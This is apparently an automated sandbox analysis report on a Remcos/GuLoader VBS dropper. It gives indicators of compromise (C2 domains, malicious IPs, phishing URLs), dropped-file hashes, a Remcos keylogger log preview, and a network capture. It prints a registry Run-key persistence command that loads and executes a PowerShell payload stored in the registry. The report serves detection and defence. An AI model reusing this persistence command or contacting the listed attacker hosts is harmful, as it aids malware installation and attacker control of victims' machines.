                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:07:22 | API Interceptor | 104x Sleep call for process: powershell.exe modified
08:07:26 | API Interceptor | 2x Sleep call for process: svchost.exe modified
08:08:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run obviously %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
08:08:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run obviously %Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
Match | Associated Sample Name / URL | Detection | Threat Name
195.54.178.4 | https://www.klubik.ge/wp-admin/tconta/?cid=bsmarado@emfa.pt | malicious | Unknown
180.214.236.46 | TNT-FEDEX-SHIPMENT-DELIVERY-FORM-3073736358-Incomplete Address.vbs | malicious | Remcos, GuLoader
180.214.236.46 | ___________-29-01-24.vbs | malicious | Remcos, GuLoader
180.214.236.46 | CR-FEDEX_TNT-903773663_TNT_AD-10440501_CF-0380.vbs | malicious | Remcos, GuLoader
180.214.236.46 | 17058285076c37a7073b87ecdd13242beec1b9459e2f79782c6bee6be8ad8e0ae732d6cb0f664.dat-decoded.exe | malicious | Remcos
180.214.236.46 | DOC_SCANNER_847464_8474.vbs | malicious | Remcos
180.214.236.46 | Scan_October_17th_Print_Request.vbs | malicious | Remcos, GuLoader
180.214.236.46 | CR-FEDEX_TNT-SHIPMENT_930388383_NOTICE_84937739038.vbs | malicious | Remcos
180.214.236.46 | DHL_STATEMENT_OF_ACCOUNT-UNPAID_INVOICE.js | malicious | Remcos
180.214.236.46 | o1f4NDWzNn.exe | malicious | Remcos
180.214.236.46 | bOd2.exe | malicious | Remcos
Match | Associated Sample Name / URL | Detection | Threat Name | Context
rnnfibiteammony.duckdns.org | TNT-FEDEX-SHIPMENT-DELIVERY-FORM-3073736358-Incomplete Address.vbs | malicious | Remcos, GuLoader | 180.214.236.46
rnnfibiteammony.duckdns.org | ___________-29-01-24.vbs | malicious | Remcos, GuLoader | 180.214.236.46
rnnfibiteammony.duckdns.org | CR-FEDEX_TNT-903773663_TNT_AD-10440501_CF-0380.vbs | malicious | Remcos, GuLoader | 180.214.236.46
rnnfibiteammony.duckdns.org | 17058285076c37a7073b87ecdd13242beec1b9459e2f79782c6bee6be8ad8e0ae732d6cb0f664.dat-decoded.exe | malicious | Remcos | 180.214.236.46
rnnfibiteammony.duckdns.org | DOC_SCANNER_847464_8474.vbs | malicious | Remcos | 180.214.236.46
rnnfibiteammony.duckdns.org | Scan_October_17th_Print_Request.vbs | malicious | Remcos, GuLoader | 180.214.236.46
rnnfibiteammony.duckdns.org | CR-FEDEX_TNT-SHIPMENT_930388383_NOTICE_84937739038.vbs | malicious | Remcos | 180.214.236.46
rnnfibiteammony.duckdns.org | BL_HDYDEY32.vbs | malicious | Remcos, GuLoader | 192.3.13.112
rnnfibiteammony.duckdns.org | Purchase_Inquiry_Evermore_Group.vbs | malicious | Remcos | 199.195.253.181
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASDELTATELECOMRU | https://www.klubik.ge/wp-admin/tconta/?cid=bsmarado@emfa.pt | malicious | Unknown | 195.54.178.4
ASDELTATELECOMRU | tcA9GYD5Gu | malicious | Mirai | 195.54.178.2
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | 5f1uj5aMdD.elf | malicious | Unknown | 95.141.43.103
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | file.exe | malicious | LummaC, Glupteba, SmokeLoader, Stealc, Xmrig | 83.136.106.50
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | yaALNupJCH.exe | malicious | Amadey, Remcos, Vidar | 95.141.41.12
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | szsLEDKLDZ.elf | malicious | Unknown | 92.114.92.30
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | 9nSv9py6hs.exe | malicious | DanaBot | 95.141.32.211
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | file.exe | malicious | DanaBot | 95.141.32.211
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | upx9bnsbiZ.exe | malicious | Raccoon Stealer v2 | 95.141.41.13
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | file.exe | malicious | DanaBot, Raccoon Stealer v2, SmokeLoader | 95.141.41.13
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | bdf7f13dca65ddcf112e9ff77f6ea6ca00c9dc23f5f60.exe | malicious | Raccoon Stealer v2 | 95.141.41.13
ASSEFLOWAmsterdamInternetExchangeAMS-IXIT | SecuriteInfo.com.MSIL.Small.CO.tr.25516.exe | malicious | Unknown | 95.141.38.173
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | H2A6LpLYtc.elf | malicious | Gafgyt, Mirai | 14.225.234.68
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | catzx.scr.exe | malicious | Nanocore, PureLog Stealer | 103.114.104.158
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Factura 79.doc | malicious | Nanocore, PureLog Stealer | 103.114.104.158
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | SecuriteInfo.com.Win32.CrypterX-gen.31058.18522.exe | malicious | Nanocore | 103.114.104.158
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | 9hhv3eDQsn.exe | malicious | Nanocore, PureLog Stealer | 103.114.104.158
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | NEW ORDER.doc | malicious | Nanocore, PureLog Stealer | 103.114.104.158
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | HDTFFrAXui.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc | 103.200.23.98
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | hxM0QidAhi.exe | malicious | Nanocore | 103.114.104.158
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | 2kD4ifhFhV.exe | malicious | Nanocore, PureLog Stealer | 103.114.104.158
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | NEW ORDER QUANTITY.doc | malicious | Nanocore, PureLog Stealer | 103.114.104.158
Match | Associated Sample Name / URL | Detection | Threat Name | Context
28a2c9bd18a11de089ef85a160da29e4 | http://docs.google.com/presentation/d/e/2PACX-1vSoFYly7DA_QOx1-oa4Z930-rXqKhRDb4g1p62g-gRoh4ijJNtvMcjW6eZ2QQBeKy4KrVPZxjmK7E-Q/pub?start=false&loop=false&delayms=3000 | malicious | HtmlDropper, HTMLPhisher | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | lnvoice-1605700252.pdf .js | malicious | AgentTesla, PureLog Stealer, zgRAT | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | http://www.51bcm.com:8088 | malicious | Unknown | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | Subscription Billing Statement.html | malicious | HTMLPhisher | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | https://cloudflare-ipfs.com/ipfs/bafkreif2klim7glbgcsrfe6lm7wfd2scwmhee5i6dglyggzgvjgl53zw2i/ | malicious | HTMLPhisher | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | https://www.vmvwx.cn/ | malicious | Unknown | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | https://dxicarcc.dynv6.net/ | malicious | Unknown | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | https://www.kcgmi.cn/ | malicious | Unknown | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | https://www.ckygy.cn/ | malicious | Unknown | 195.54.178.4, 89.40.227.248
28a2c9bd18a11de089ef85a160da29e4 | https://www.eehvh.cn/ | malicious | Unknown | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | invoice.vbs | malicious | XWorm | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | Setup.exe | malicious | LummaC, PureLog Stealer, Xmrig | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | KT0b2oEFIV.exe | malicious | Vidar | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | g8DU6moaZ0.exe | malicious | Amadey, Mars Stealer, RisePro Stealer, SmokeLoader, Stealc, Vidar | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.AdwareX-gen.20903.16690.exe | malicious | Unknown | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | Mw59hGEx48.exe | malicious | GuLoader, PureLog Stealer | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.25983.22631.exe | malicious | Unknown | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.25983.22631.exe | malicious | Unknown | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | venerationens.exe | malicious | FormBook, GuLoader | 195.54.178.4, 89.40.227.248
37f463bf4616ecd445d4a1937da06e19 | Quote.exe | malicious | AgentTesla, GuLoader | 195.54.178.4, 89.40.227.248
                                                      No context
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xac90964b, page size 16384, DirtyShutdown, Windows version 10.0
                                                      Category:dropped
                                                      Size (bytes):1310720
                                                      Entropy (8bit):0.658561270235085
                                                      Encrypted:false
                                                      SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                      MD5:26135EC19A06545B9A020B90EAF780CC
                                                      SHA1:64E5AE4CD53C971617BC0260C79C5DE14F265841
                                                      SHA-256:B9E3CDD7DE37ED18F8C04FDE5EE2E5739054EBC7631E6FD05AA37975F03DE73D
                                                      SHA-512:E8E9CBF3CE6FCB352B16155896B65F4E93E271D49CA5FEECD86085ABF442CD4EE3840D7D786E1CFC72565E05544607A9ED0940C4564A0D1E4CB41937315E2629
                                                      Malicious:false
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288
                                                      Entropy (8bit):3.3264850572432407
                                                      Encrypted:false
                                                      SSDEEP:6:6lolclxql55YcIeeDAlKe52WA41gWAAe5q1gWAv:6lolfhec8e52WIWFe5BW+
                                                      MD5:05F35F86A26E986E726EFEB3B6B65BB1
                                                      SHA1:84C9E175B7F4D5B6D481202C1BD889E8DD27EC0B
                                                      SHA-256:DF61BE53FFCA15FC17972C97409E619A0AF971CB7D9F89419058313472A8EAEC
                                                      SHA-512:978304DC7424400ECDEE834949F4A94579EF024209EF1C7DEE59091BE50D3B854B83B60D36B435448AD4F6851E4888F2B885876E94973791E12C1A7A352E6C8C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:[2024/03/18 08:08:16 Offline Keylogger Started] [Win]r [Program Manager] [Run] [Program Manager] [Win]r [Run] [Program Manager]
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11914
                                                      Entropy (8bit):4.896235276832004
                                                      Encrypted:false
                                                      SSDEEP:192:Ixoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sa:WVib49+VoGIpN6KQkj2xkjh4iUxRcYK6
                                                      MD5:96420197D195D4ABC60724F24234CACA
                                                      SHA1:192ACD14552FB56B27AE0DD34B5B6DFCC6152B9B
                                                      SHA-256:0DCE3F924E46FDA8B63D8DA386D20D70EAA0C4C528DD4032DF0D8702FDC1B91D
                                                      SHA-512:14510349BB77CE85A5B2B2B3E934EA4A9F074F891A934299C9B839E7E16E271807B2814E780CD1A9862D5D1B1303E7C74DA89300C2CF655EB99DDAB82909680F
                                                      Malicious:false
                                                      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                      MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                      SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                      SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                      SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                      Malicious:false
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):266951
                                                      Entropy (8bit):5.109438425605264
                                                      Encrypted:false
                                                      SSDEEP:6144:NWKtYtINI5Mk6fqMKYJwMHy0J4iwLwhB2UcJXkcY9CdLzHxYRvbFjtkBbwhMrO+9:4qV3hlv09rDBv
                                                      MD5:24E91A49607EDE884A14B783CB121F06
                                                      SHA1:36747BFDDF559B80BB10B00B24C67FDBBF5B9752
                                                      SHA-256:56F1CDBF09847AAD535B64C84BF66D423701FEC3F324CAB83C9D8E17CD976226
                                                      SHA-512:2B93B5A99F3409AF7C1F0B3C9E77006B9130A034641D718B499F57867311A0907D658AA529DECD71DB39E71FE90908D46CA79AC3EC00B9D6996C58B282795237
                                                      Malicious:true
                                                      Preview:....Pericholangitisdogberries = Timer....'Gentilesse fdselshjlperen ungreat..'Celletypes genforhandlede opklbede nedsivningsbekendtgrelser..'Hemoglobulin, ansatsstykke, indsigelsers, involute tvetydighedernes..'unscrutinisingly convener48 cbabbage rakkeris250 tvangsfuldbyrdedes!..'Trks removable sdebadenes..'Stimuloir porno! nonenlightened53 sulken139; blomster...'Stiftsfrknernes. ehlite unobserving plumule..'Protonemata afmalingers razzed thrashes..'Cappuccinoens albuminizes genopstaaet indrapporteres33..'Adresseliniernes takhtadjy kulturministrene legitimationernes catlap!..'haabloest! sammenbygge semihobos buzzsaws vexil..'truller, riftless. micrograph52 rundeste..'Udpolstrers photomicrographical..'Firmalogo transcend..'Respektfuldere understellene omvurderings gunline plissau;..'Muzziest balsameringens udoedelig afforest140..'Mellemnavn skrkkampagnes, eulogizations, balboa indkasseringerne?..'Norss trochart notabilitets...'Kanalsyet liniediagrammers,..'Sideskiftene blodtilfrsel syn
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):429872
                                                      Entropy (8bit):5.976851969349054
                                                      Encrypted:false
                                                      SSDEEP:6144:t/W8r4vs3ivTt8oFfHgXaoQ9/RoE4tiB5jLFYrPp+YzkT6nMUMJPzGW/1gRH:t1rgdaotHOnQJRoWLWrPpMONMBzGy1gZ
                                                      MD5:08592DB9D8ED3B5E0376FB735D36CA36
                                                      SHA1:39776FD91D9617E7112AAEC2A43BB7E51D06B336
                                                      SHA-256:463C92C14E5B68211DC0917B0AE9823A1AE326B79A8D74BDF87DA5AE0A606E11
                                                      SHA-512:BF02F3219A3D9770952138BED8DAEA15737AE57D1DDC1068792E584171EE9ECA43636055F2028873CAA4FB18C6316F933CF23B44736A9F7960316C8C67BEF504
                                                      Malicious:false
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):483156
                                                      Entropy (8bit):5.96824642487463
                                                      Encrypted:false
                                                      SSDEEP:12288:Ug73VdtMCUFk5/6C9tqoEgAeoszRYQFBmweXM:P/yCR5/Ntqo0ebzRzF
                                                      MD5:85472E36DFECBC7055E57085322D6D9C
                                                      SHA1:DDEBEF4F4BF736D9654F24C9B2FD4B061D2AB518
                                                      SHA-256:D96FBBCDD42668D00B3744D4258850A51AC9B01741D72EAB15624F5B50C0F458
                                                      SHA-512:5B61CC3D449D37C4F7840C3A94304192EF1272F964B2A6A9892317B645D1FF5C58AFEA4803119FC3A3534FB9E2CD1348463EEB2B60EBECCDA61171875AA4441F
                                                      Malicious:false
                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):5.110739505966945
                                                      TrID:
                                                        File name:BKGCONF-THD1914129-BKGCONF-THD1914129.vbs
                                                        File size:267'482 bytes
                                                        MD5:62362dc3fc9d67f81dd8bcd670e8c117
                                                        SHA1:c871994bee2042d4cac07220e283166c3f58aa3f
                                                        SHA256:e9144edc2096347981ed7ea94f6898cfd400918558cb0aba2f4edabbe472cf61
                                                        SHA512:016586ea1e4f81f8f1f9ce7a9080575e21678e56c2942bbcb010b3fe6625b69caaf8238719716a43890a8f3edc7f844c0392bf38f7ed6779eab6bceea6036d89
                                                        SSDEEP:6144:NnKtYtINI5Mk6fqMKYJwMHy0J4iwLwhB2UcJXkcY9CdLzHxYRvbFjtkMQhM4O/Jk:VqV3hlvXd4Iob
                                                        TLSH:CF44E6A3CF0A26190F8A2FC5AC61C95286FB41B531121479EEEDC7DDA183DACD2FC915
                                                        File Content Preview:....Pericholangitisdogberries = Timer....'Gentilesse fdselshjlperen ungreat..'Celletypes genforhandlede opklbede nedsivningsbekendtgrelser..'Hemoglobulin, ansatsstykke, indsigelsers, involute tvetydighedernes..'unscrutinisingly convener48 cbabbage rakkeri
                                                        Icon Hash:68d69b8f86ab9a86
                                                        Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                        Mar 18, 2024 08:07:35.241815090 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.241892099 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.242269993 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.242345095 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.242631912 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.242702961 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.284111023 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.284244061 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.284486055 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.284575939 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.381736994 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.382093906 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.382132053 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.382158041 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.382184982 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.382210016 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.382666111 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.382745028 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.383023977 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.383101940 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.383424997 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.383502007 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.384025097 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.384131908 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.384514093 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.384584904 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.384689093 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.384756088 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.384764910 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.384808064 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.384850979 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.384907961 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.385665894 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.385680914 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:35.385690928 CET49733443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:35.385698080 CET4434973389.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.063343048 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.063399076 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.063498020 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.063826084 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.063839912 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.424254894 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.424952984 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.425000906 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.425939083 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.425945044 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.776163101 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.776345968 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.776439905 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.776568890 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.776590109 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.776603937 CET49734443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.776608944 CET4434973489.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.808571100 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.808604956 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:41.808696032 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.809082985 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:41.809092999 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.169194937 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.210563898 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.308725119 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.308742046 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.309987068 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.309990883 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.521131039 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.521159887 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.521168947 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.521317959 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.521342993 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.569943905 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.697684050 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.697701931 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.697758913 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.697767019 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.697824001 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.697855949 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.697896957 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.697918892 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.698101044 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.698168039 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.783833027 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.783936024 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.873711109 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.873791933 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.873821020 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.873836040 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.873888969 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.873997927 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.874062061 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.874262094 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.874320030 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.915204048 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.915292978 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.915298939 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.915311098 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.915374994 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:42.959527016 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:42.959645987 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:43.050508976 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:43.050662041 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:43.050685883 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:43.050734997 CET4434973689.40.227.248192.168.2.5
                                                        Mar 18, 2024 08:07:43.050782919 CET49736443192.168.2.589.40.227.248
                                                        Mar 18, 2024 08:07:43.050797939 CET49736443192.168.2.589.40.227.248
